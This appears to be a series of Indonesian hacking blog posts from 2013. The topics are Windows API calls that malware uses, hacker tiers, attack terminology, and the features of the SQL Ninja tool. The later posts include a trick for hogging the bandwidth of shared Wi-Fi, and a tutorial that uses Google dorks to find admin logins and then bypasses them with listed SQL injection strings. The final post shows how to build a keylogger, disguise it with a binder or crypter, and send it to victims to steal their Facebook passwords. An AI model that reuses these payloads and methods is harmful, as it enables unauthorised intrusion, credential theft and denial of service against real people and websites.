Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms644990(v=vs.85).aspx
———-
CreateFile
———-
Membuat file baru atau membuka file yang sudah ada.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
—————–
CreateFileMapping
—————–
Membuat buffer untuk mapping file yang memuat file ke memori dan
membuatnya dapat diakses melalui alamat memori. Biasanya malware tipe launcher, loader, dan injector
menggunakan fungsi ini untuk membaca dan memodifikasi file PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366537(v=vs.85).aspx
———–
CreateMutex
———–
Fungsi yang dapat digunakan oleh malware untuk membuat mutex,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682411(v=vs.85).aspx
————-
CreateProcess
————-
fungsi yang digunakan malware untuk Membuat atau menjalankan proses baru.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx
————-
CreateService
————-
Biasanya malware Membuat service yang dapat membuat dirinya berjalan pada saat boot berlangsung,tanpa
perlu memanipulasi registry
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450(v=vs.85).aspx
Tehnik atau Fungsi Khusus Pada Malware
Anti Debugging
—————–
IsDebuggerPresent
—————–
Cek untuk melihat apakah proses saat ini sedang di debug, fungsi ini sebagai bagian dari
teknik anti-debugging.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345(v=vs.85).aspx
—————–
OutputDebugString
—————–
menghasilkan Output string ke debugger jika sedang dalam debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
————————–
CheckRemoteDebuggerPresent
————————–
Fungsi untuk melihat atau melakukan cek apakah proses tertentu atau proses diri sendiri sedang di debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms679280(v=vs.85).aspx
=======================================================
Lainnya,seperti akses internet,jaringan dan sebagainya
=======================================================
———————
AdjustTokenPrivileges
———————
Digunakan untuk mengaktifkan atau menonaktifkan hak akses tertentu pada proses. Biasanya Malware yang
melakukan injeksi pada proses sering memanggil fungsi ini untuk mendapatkan hak akses tambahan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa375202(v=vs.85).aspx
——
BitBlt
——
Digunakan untuk menyalin data grafis dari satu perangkat ke perangkat lainnya.
Spyware kadang-kadang menggunakan fungsi ini untuk menangkap screenshot. Fungsi ini sering
ditambahkan oleh compiler sebagai bagian dari kode perpustakaan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd183370(v=vs.85).aspx
———————–
GetSystemDefaultLangId
———————–
Mendapatkan pengaturan default bahasa untuk sistem. Hal ini dapat digunakan
untuk menyesuaikan menampilkan dan nama file, sebagai bagian dari survei dari korban
yang terinfeksi, atau dengan malware “patriotik” yang mempengaruhi sistem hanya dari daerah atau negara
tertentu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd318120(v=vs.85).aspx
————-
NetShareEnum
————
Digunakan untuk menghitung atau kalkulasi jaringan yang di shared.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb525387(v=vs.85).aspx
——————–
NtQueryDirectoryFile
——————–
Mendapatkan informasi tentang file dalam direktori. Rootkit biasanya menghubungkan
fungsi ini untuk menyembunyikan file.
Link : http://msdn.microsoft.com/en-us/library/windows/hardware/ff556633(v=vs.85).aspx
————–
VirtualAllocEx
————–
Sebuah rutinitas memori-alokasi yang dapat mengalokasikan memori dalam proses remote.
Malware menggunakan VirtualAllocEx sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366890(v=vs.85).aspx
—————-
VirtualProtectEx
—————-
Perubahan perlindungan pada daerah memori. Malware dapat menggunakan ini
berfungsi untuk mengubah bagian read-only dari memori untuk dieksekusi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366899(v=vs.85).aspx
——————
WriteProcessMemory
——————
Digunakan untuk menulis data ke proses remote. Malware menggunakan WriteProcessMemory
sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms681674(v=vs.85).aspx
————
GetTickCount
————
Mengambil jumlah milidetik sejak boot berlangsung. Fungsi ini
kadang-kadang digunakan untuk mengumpulkan informasi waktu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724408(v=vs.85).aspx
—————-
InternetOpenUrl
—————-
Membuka URL tertentu untuk koneksi menggunakan FTP, HTTP, HTTPS atau.
URL
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385098(v=vs.85).aspx
—————-
InternetReadFile
—————-
Membaca data dari URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385103(v=vs.85).aspx
—————–
InternetWriteFile
—————-
Menulis data ke URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385128(v=vs.85).aspx
————–
IsWoW64Process
————–
Digunakan oleh proses 32-bit untuk menentukan apakah proses yang berjalan itu adalah proses 64-bit
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
——————————
Wow64DisableWow64FsRedirection
——————————
Menonaktifkan File redirection yang terjadi di 32-bit file yang dimuat pada sistem 64-bit.
Jika aplikasi 32-bit membuat file ke \Windows\System32 setelah memanggil fungsi ini,
maka akan membuat file secara tepat ke \Windows\System32 bukan diarahkan ke \Windows\SysWOW64.

Thanks Uda hadir Di Blog Aq Semoga Bermanfaat Ya Kawan ^_^

Tingkatan Dan Pengertian Hacker

2013-06-12T21:05:00.000+07:00

Hacker adalah orang yang mempelajari, memodifikasi, mempelajari, dan menerobos suatu jaringan komputer atau website. mungkin sobat pernah mendengar kata "facebook gw di hack" nah, belum tentu itu adalah kerjaan kacker itu adalah kerjaan teman sobat atau cracker karena perlu digaris bawahi perbedaan antara hacker dengan cracker. pada kali ini saya akan posting terlebih dahulu tentang hacker. Hacker memiliki aturan sedangkan cracker tidak. Berikut peraturan dalam hacking :

Peraturan Hacking :
1. Di atas segalanya, hormati pengetahuan & kebebasan informasi.
2. Memberitahukan sistem administrator akan adanya pelanggaran keamanan/lubang di keamanan yang anda lihat.
3. Jangan mengambil keuntungan yang tidak fair dari hack.
4. Tidak mendistribusikan & mengumpulkan software bajakan.
5. Tidak pernah mengambil risiko yang bodoh
6. Selalu mengetahui kemampuan sendiri.
7. Selalu bersedia untuk secara terbuka/bebas/gratis memberitahukan & mengajarkan berbagai informasi & metode yang diperoleh.
8. Tidak pernah meng-hack sebuah sistem untuk mencuri uang.
9. Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
10. Tidak pernah secara sengaja menghapus & merusak file di komputer yang diretas.
11. Hormati mesin yang diretas, dan perlakukan dia seperti mesin sendiri.
Setelah sobat melihat peraturan dalam hacking, mungkin sekarang sudah terbayang kan perbedaan hacker dengan cracker? jika belum, nanti saya akan posting tentang cracker. Untuk memperjelas sobat tentang hacker, saya akan memberitahu tentang tingkatan hacker, mungkin sobat juga bisa lihat tingkat sobat dimana. berikut tingkatannya :

Tingkatan Hacker :

1. Lamer:
Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker dan ingin menjadi seperti mereka. Penggunaan komputer mereka hanyalah untuk main game, IRC, tukar-menukar perangkat lunak bajakan dan mencuri kartu kredit. Melakukan hacking menggunakan perangkat lunak trojan, nuke, dan DoS. Biasanya menyombongkan diri melalui IRC channel. Karena banyak kekurangan untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai tingkat developed kiddie atau script kiddie saja.
2. Script Kiddie:
Seperti developed kiddie, Script Kiddie biasanya melakukan aktivitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan hidup pengguna Internet.
3. Developed Kiddie:
Sebutan ini terutama karena umur kelompok ini masih muda (ABG) dan masih sekolah. Mereka membaca tentang metode hacking dan caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil dan memproklamasikan kemenangan ke peretas lainnya. Umumnya mereka masih menggunakan Grafic User Interface (GUI) dan baru belajar hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4. Semi Elite :
Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya (vulnerability)). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker tingkat ini. Sialnya oleh para Elite mereka sering kali dikategorikan Lamer.5. Elite :
Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka memahami sistem operasi sisi luar dalam, sanggup mengkonfigurasi dan menyambungkan jaringan secara global. Sanggup melakukan pemrograman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya efisien & terampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman yang dapat memasuki sistem tanpa terdeteksi, walaupun mereka tidak akan menghancurkan data-data yang ditemui. Karena mereka selalu mengikuti peraturan yang ada.

Kemudian saya akan memberitahu tentang perbedaan White Hat Hacker dan Black Hat Hacker. Mungkin jika kita mendengar namanya saja pasti sudah tahu dong perbedaannya? Yapz perbedaannya adalah dari segi Baik dan Buruk-nya.

Pengertian White Hat Hacker :

White Hat Hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut. Topi putih atau peretas putih adalah pahlawan atau orang baik, terutama dalam bidang komputer, dimana ia menyebut etika hacker atau penetrasi penguji yang berfokus pada mengamankan dan melindungi IT sistem.
White Hat Hacker juga biasa disebut "Good Hacker" adalah ahli keamanan komputer, yang berspesialisasi dalam penetrasi pengujian, dan pengujian metodologi lain, untuk memastikan bahwa perusahaan sistem informasi yang aman. Pakar keamanan ini dapat memanfaatkan berbagai metode untuk melaksanakan uji coba mereka, termasuk rekayasa sosial taktik, penggunaan alat-alat hacking, dan upaya untuk menghindari keamanan untuk mendapatkan masuk ke daerah aman.

Ciri-ciri White Hat Hacker :
Black hat SEO taktik seperti spamdexing, berusaha untuk mengarahkan hasil pencarian ke halaman target tertentu dengan cara yang bertentangan dengan mesin pencari 'terms of service, sedangkan metode White Hat umumnya disetujui oleh mesin pencari. White Hat Hacker cenderung menghasilkan hasil yang baik dan legal, sedangkan Black Hat mengantisipasi bahwa situs mereka mungkin pada akhirnya akan dilarang baik sementara atau secara permanen setelah mesin pencari menemukan apa yang mereka lakukan.

Black Hat Hacker
Black Hat adalah istilah TI yang mengacu kepada para Hacker yang menerobos sistem keamanan komputer tanpa izin. nah, Black Hat ini bisa dikategorikan sebagai Cracker.

Cara melakukan Hacking :
1. Hacktivist ;
hacktivis adalah hacker yang menggunakan teknologi untuk mengumumkan pandangan sosial, ideologi, agama, atau pesan politik.Dalam kasus yang lebih ekstrem,hacktivism digunakan sebagai alat untuk cyberterrorism.
2. Meretas komputer ;
meretas komputer merupakan Sebuah contoh umum dari eksploitasi keamanan adengan cara injeksi SQL,melalui lubang keamanan yang mungkin disebabkan dari praktik pemrograman bawah standar. Eksploitasi lain akan dapat digunakan melalui FTP, HTTP, PHP, SSH, Telnet dan beberapa halaman web.
3. Vulnerability scanner ;
Sebuah Vulnerability scanner adalah alat yang digunakan untuk dengan cepat mengecek komputer pada jaringan untuk diketahui kelemahan.Hacker juga biasanya menggunakan port scanner.port scanner ini adalah alat untuk melihat port pada komputer tertentu untuk mengakses komputer, dan kadang-kadang akan mendeteksi program nomor versinya.firewall melindungi komputer dari penyusup dengan membatasi akses ke port
4. Password cracking ;
Password cracking adalah sebuah aplikasi yang menangkap paket data, yang dapat digunakan untuk mencuri password dan data lain dalam transit melalui beberapa jaringan.
5. Trojan horse ;
Trojan horse adalah program yang tampaknya akan melakukan satu hal, tetapi sebenarnya melakukan hal lain.Sebuah Trojan horse dapat digunakan untuk mendirikan sebuah pintu belakang dalam sebuah sistem komputer sedemikian rupa sehingga penyusup dapat memperoleh akses upa seckemudian. (Nama trojan horse merujuk pada kuda dari Perang Troya, dengan fungsi secara konseptual menipu para prajurit untuk membawa seorang penyusup masuk.)
6. Virus ;
Virus adalah sebuah program replikasi diri yang menyebar dengan menyisipkan salinan dirinya ke dalam kode executable lain atau dokumen.Dengan demikian, virus komputer berperilaku mirip dengan virus biologis yang menyebar dengan memasukkan dirinya ke dalam sel-sel hidup.
7. Worm ;
Seperti virus, worm juga merupakan program replikasi diri.Sebuah worm berbeda dari virus itu menyebar melalui jaringan komputer tanpa campur tangan pengguna.Banyak orang bingung membedakan istilah "virus" dan "worm".
8. Spy Net ;
Adalah program yang secara otomatis memata matai komputer korban, tetapi hanya jaringan internetnya saja bukan aktivitas komputernya. Biasanya masuk melalui message/ e-mail dari orang yang tak dikenal melalui video chat dan lain lain.
9. Keylogger ;
Adalah sebuah program yang dibuat khusus untuk memata-matai komputer tertentu dalam bentuk suara, gambar atau pun tulisan. Biasanya hanya di-inject melalui flashdiskataupun USB (Universal Serial Bus).

Semoga Bermanfaat Ya Kawan-Kawan ^_^

Cara Menguasai Jaringan Wi-Fi Dengan CMD Win7

2013-06-12T21:01:00.000+07:00

Halo sobat,,kali ini saya akan berbagi info tentang Cara Menguasai Jaringan Wi-Fi Dengan Command Prompt Win 7,,,Oke, Check it out.

Ikuti langkah-langkah berikut tanpa kurang sedikit pun :

·Buka Start -> All program -> accessories lalu klik kanan command prompt dan pilih run as administrator, atau bisa juga langsung ketikkan cmd.exe pada kolom search di start menu.

·Maka akan muncul tampilan seperti ini.

·Lalu Ketikan ipconfig/all di pointer yang kedip-kedip. Perintah ini berfungsi untuk menampilkan informasi seputar koneksi dimana anda berada sekarang.

·Hasilnya akan seperti dibawah ini. yang berisi segala macam informasi tentang komputer anda. Lalu cari yang namanya DNS Server kemudian lihat kode yang ada di sebelahnya, dan kode itu yang harus anda ingat, dan kalo perlu tulis dahulu di notepad.

·Lalu scrolling cmd.exe kalian kebagian yang paling bawah, maka kalian akan menemukan perintah seperti perintah awal untuk mengetik. Kini perintah ketikannya beda lagi. Ketikkan perintah seperti berikut ping -L 500 10.0.1.2 -t. dan kode 10.0.1.2 itu berasal dari DNS Server yang tertera di atas (*DNS Server Punya saya). Ganti dengan DNS Server kalian.

·Tekan Enter. Maka akan tampak proses seperti dibawah ini. Biarkan proses itu berjalan terus selama kalian online menggunakan wifi dimana tempat kalian sedang nongkrong sekarang ini. Bila perlu minimize saja, asal jangan di tutup cmd.exenya.

Cara ini bertujuan untuk menyedot bandwitch yang sedang digunakan oleh orang lain dalam satu jaringan hotspot/wifi yang sama-sama kalian gunakan. Jika anda kurang puas dengan kecepatannya bisa anda ganti 500 menjadi 1000 atau 2000. Tetapi saya sarankan jangan berlebihan kasihan kan orang lain. dan tambahan lagi cara ini hanya berlaku di windows saja kalau linux saya belum pernah mencoba.

Istilah yang di gunakan di dunia hacking

2013-06-12T20:58:00.000+07:00

Berikut Istilah-Istilah dalam Dunia Hacking yang Perlu Kamu Ketahui :

1). Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

2). Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.

3). Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

4). RFI
-> Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.

5). LFI
-> Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).

6). SQL Injection
-> Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.

7). DDoS
-> Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.

8). Shell
-> Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.

9). Deface
-> Merubah tampilan halman suatu website secara paksa dan illegal.

10). Debug
-> Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.

11). XSS
-> Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

12). Phising
-> Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

13). Keylogger
-> Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

14). Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

15). Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

16). Malicious Code/Script
-> Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.

17). Virus
-> Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.

18). Worm
-> Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

19). Trojan
-> Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

20). Backdoor
-> Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

Semoga Setelah Mengerti Istilah Anda Dapat Lebih Mengerti Dan Lebih Mengenal Dunia Hacker.... Semoga Bermanfaat Ya., Tunggu Post ku Yang Lain Ya ......

Cara Hacking Dengan SQL-Ninja

2013-06-12T20:56:00.000+07:00

SQL Ninja merupakan sebuah tool yang digunakan untuk SQL Injection dan merupakan tools untuk megambil alih database. Pada intinya SQL Ninja adalah alat yang ditargetkan untuk mengeksploitasi kelemahan SQL Injection pada aplikasi web yang menggunakan Microsoft SQL Server sebagai back end-nya dan juga sebagian lainnya.

Tujuan utama SQL Ninja adalah untuk menyediakan akses remote pada server database yang memiliki kerentanan, bahkan di lingkungan yang sangat secure sekalipun. Hal ini juga bisa digunakan oleh penetration tester untuk membantu dan mengotomatisasi proses dalam mengambil alih Server DB ketika kerentanan SQL Injection telah ditemukan.

Fitur yang tersedia:

1 Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)

2 Bruteforce of ‘sa’ password (in 2 flavors: dictionary-based and incremental)

3 Privilege escalation to sysadmin group if ‘sa’ password has been found

4 Creation of a custom xp_cmdshell if the original one has been removed

5 Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)

6 TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell

7 Direct and reverse bindshell, both TCP and UDP

8 ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box

9 DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)

10 Evasion techniques to confuse a few IDS/IPS/WAF

11 Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection

12 Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping

13 Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM

Requirement:

Sql Ninja menggunakan Perl, sehingga yang dibutuhkan adalah install Perl dan beberapa module berikut jika tidak ada secara default:

* NetPacket

* Net-Pcap

* Net-DNS

* Net-RawIP

* IO-Socket-SSL

* Net-Pcap

Anda juga akan memerlukan Metasploit Framework Minimum 3 di komputer anda untuk menggunakan modus serangan menggunakan metasploit, dan juga install VNC client jika Anda menggunakan payload VNC.

Jika sesuatu berjalan salah, sebaiknya anda mengaktifkan output verbose ketika install (-v opsi) dan / atau debugging (-d) harus menyediakan beberapa petunjuk. SQL Ninja bekerja pada system Gentoo, namun sqlninja telah dicoba untuk bisa berjalan pada sistem operasi berikut:

Linux

FreeBSD

Mac OS X

Cara Bobol Password Admin Sebuah Web

2013-06-12T20:53:00.000+07:00

Bobol Password Administrator Website dengan SQL Injection
Dari pada mumet, mending berbagi tips dan trik cara membobol administrator sebuah website bagaimana caranya di bawah ini saya akan sharekan buat sobat-sobat semua bahan-bahan apa saja yang di butuhkannya silahkan di simak baik-baik penjelasannya dan jika sobat-sobat sudah ada yang berhasil saya harap ilmu ini tidak di sebar luaskan karena berbahaya. di sini kita akan menggunakan SQL INJECTION untuk tutorialnya silahkan di baca di bawah, dan khusus buat sobat-sobat semua saya kasih sama VIDEO TUTORIAL SIMPELNYA:

VIDEO TUTORIALNYA SILAHKAN DI DOWNLOAD DI SINI

DAN UNTUK PASWORDNYA DOWNLOAD DISINI

Karena saya lagi baik hati silahkan di simak juga tutorialnya di bawah;
Satu lagi posting ini tidak akan lama di pajang disini karena berbahaya alias mau ane delete khusus post ini,,harap di maklumi..

TUTORIAL SQL INJECTION

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice

Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection

Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :

Berubah menjadi :

Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :

Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :

Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}

3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

Cara Hacking Dengan Keylogger Terbaru

2013-06-12T20:51:00.000+07:00

Hacking kini sudah mulai ramai dibicarakan karena banyak situs serta account yang sudah sering dijebol dengan para hacker misalnya hack facebook password, hack yahoo password, hack hotmail password, hack gmail password, hack blogger password, hack paypal, hack ebay password, dll. Hacking sering terjadi karena sistem keamanan yang mudah dijebol atau kecorobohan yang dilakukan user. Untuk itu artikel ini bertujuan untuk membahas bagaimana hacker menjebol account anda sehingga anda dapat menghindari dan mengenal ulah hacker tersebut.

Ada beberapa cara yang digunakan hacker untuk menjobol account yaitu dengan cara phising (login yang palsu) dan software keylogger. Hacking dengan cara phising yaitu dengan mengirim link ke account anda. Link tersebut akan membawa ke situs tertentu yang sering anda gunakan misalnya facebook atau twitter. Tampilan situs tersebut sama dengan situs yang anda gunakan, hanya saja situs tersebut adalah palsu (fake) sehingga dapat mengakses id dan password yang anda gunakan. Cara lain yang sering digunakan hacker untuk hack account milik orang lain yaitu hack facebook menggunakan keylogger. Untuk anda yang penasaran bagaimana cara menggunakan keylogger dapat melihat caranya dibawah ini:

1. Download Project Neptune Keylogger

2. Buka program yang sudah didownload

3. Setting pengaturan sesuai gambar diatas dan masukkan juga username dan password Gmail kamu lalu klik Test Email Account Information

4. Klik System wide. pastikan semua pengaturan sama seperti pada gambar!

5. Selanjutnya klik Tab Installation. Lihat gambar!

6. Setelah semua selesai klik Tab "Server Creation" lalu klik "Generate New Server" dan beri nama sesuai keinginanmu.

Untuk hack password facebook anda harus mengirim file ke korban dan membuatnya menginstalnya pada komputer. Anda dapat menggunakan Binder, crypter atau Fake Hacking Software untuk mengikat server file ini dengan Mp3 sehingga tidak terdeteksi sebagai virus dan bisa dijalankan user. Masukan file keylogger yg sudah dibuat tdi ke dalam file berformat rar atau zip agar bisa diupload ke email, pesan Facebook ataupun di Grup. Lalu kirim file tersebut ke tujuan. Apabila file keylogger dijalankan oleh korban maka alat tersebut mencari untuk semua password dan mengirimkan email yang berisi semua user-id dan password.

Sekian tutorial dari saya, semoga artikel ini bermanfaat. Ingatlah untuk berhati-hati saat browsing di internet, Safe browsing semuanya...